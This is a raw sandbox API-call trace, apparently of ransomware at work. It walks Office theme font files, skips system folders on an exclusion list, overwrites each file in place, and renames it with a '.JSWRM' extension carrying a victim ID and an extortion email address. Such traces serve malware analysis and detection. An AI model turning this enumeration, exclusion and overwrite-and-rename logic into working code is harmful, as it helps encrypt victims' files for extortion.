lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0100.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0100.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0100.984] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11436ace, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdff, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Calibri Light-Constantia.xml", cAlternateFileName="CALIBR~1.XML")) returned 1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2=".") returned 1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="..") returned 1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="...") returned 1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="windows") returned -1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="recovery") returned -1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="perflogs") returned -1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="documents and settings") returned -1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="system volume information") returned -1 [0100.984] lstrcmpiW (lpString1="Calibri Light-Constantia.xml", lpString2="msocache") returned -1 [0100.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0100.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri Light-Constantia.xml", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0100.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri Light-Constantia.xml", cchWideChar=28, lpMultiByteStr=0x2412e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Calibri Light-Constantia.xml", lpUsedDefaultChar=0x0) returned 28 [0100.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0100.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri Light-Constantia.xml", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0100.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri Light-Constantia.xml", cchWideChar=28, lpMultiByteStr=0x241290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Calibri Light-Constantia.xml", lpUsedDefaultChar=0x0) returned 28 [0100.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0100.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0100.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0100.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri Light-Constantia.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri light-constantia.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.985] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3583) returned 1 [0100.985] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdf0) returned 0x206858 [0100.985] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdf0, lpOverlapped=0x0) returned 1 [0100.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.987] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdf0, lpOverlapped=0x0) returned 1 [0100.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0100.987] CloseHandle (hObject=0x314) returned 1 [0100.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0100.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0100.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0100.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0100.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0100.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0100.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri Light-Constantia.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri light-constantia.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri Light-Constantia.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri light-constantia.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0100.989] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdd6, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Calibri-Cambria.xml", cAlternateFileName="CALIBR~2.XML")) returned 1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2=".") returned 1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="..") returned 1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="...") returned 1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="windows") returned -1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="recovery") returned -1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="perflogs") returned -1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="documents and settings") returned -1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="system volume information") returned -1 [0100.989] lstrcmpiW (lpString1="Calibri-Cambria.xml", lpString2="msocache") returned -1 [0100.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri-Cambria.xml", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0100.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri-Cambria.xml", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Calibri-Cambria.xml", lpUsedDefaultChar=0x0) returned 19 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri-Cambria.xml", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri-Cambria.xml", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Calibri-Cambria.xml", lpUsedDefaultChar=0x0) returned 19 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0100.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0100.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0100.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri-Cambria.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri-cambria.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.990] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3542) returned 1 [0100.990] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x206858 [0100.990] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdd0, lpOverlapped=0x0) returned 1 [0101.068] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.068] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdd0, lpOverlapped=0x0) returned 1 [0101.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.068] CloseHandle (hObject=0x314) returned 1 [0101.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0101.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0101.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0101.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0101.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0101.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0101.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri-Cambria.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri-cambria.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri-Cambria.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri-cambria.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0101.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0101.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0101.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0101.070] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11436ace, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1145cd4f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdac, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Calibri.xml", cAlternateFileName="")) returned 1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2=".") returned 1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="..") returned 1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="...") returned 1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="windows") returned -1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="recovery") returned -1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="perflogs") returned -1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="documents and settings") returned -1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="system volume information") returned -1 [0101.070] lstrcmpiW (lpString1="Calibri.xml", lpString2="msocache") returned -1 [0101.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0101.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Calibri.xml", lpUsedDefaultChar=0x0) returned 11 [0101.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Calibri.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Calibri.xml", lpUsedDefaultChar=0x0) returned 11 [0101.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0101.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0101.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.072] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3500) returned 1 [0101.072] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xda0) returned 0x206858 [0101.072] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xda0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xda0, lpOverlapped=0x0) returned 1 [0101.074] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.074] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xda0, lpOverlapped=0x0) returned 1 [0101.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.074] CloseHandle (hObject=0x314) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0101.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0101.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0101.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0101.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0101.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.074] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Calibri.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\calibri.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0101.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0101.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0101.075] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11436ace, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11436ace, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde4, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Cambria.xml", cAlternateFileName="")) returned 1 [0101.075] lstrcmpiW (lpString1="Cambria.xml", lpString2=".") returned 1 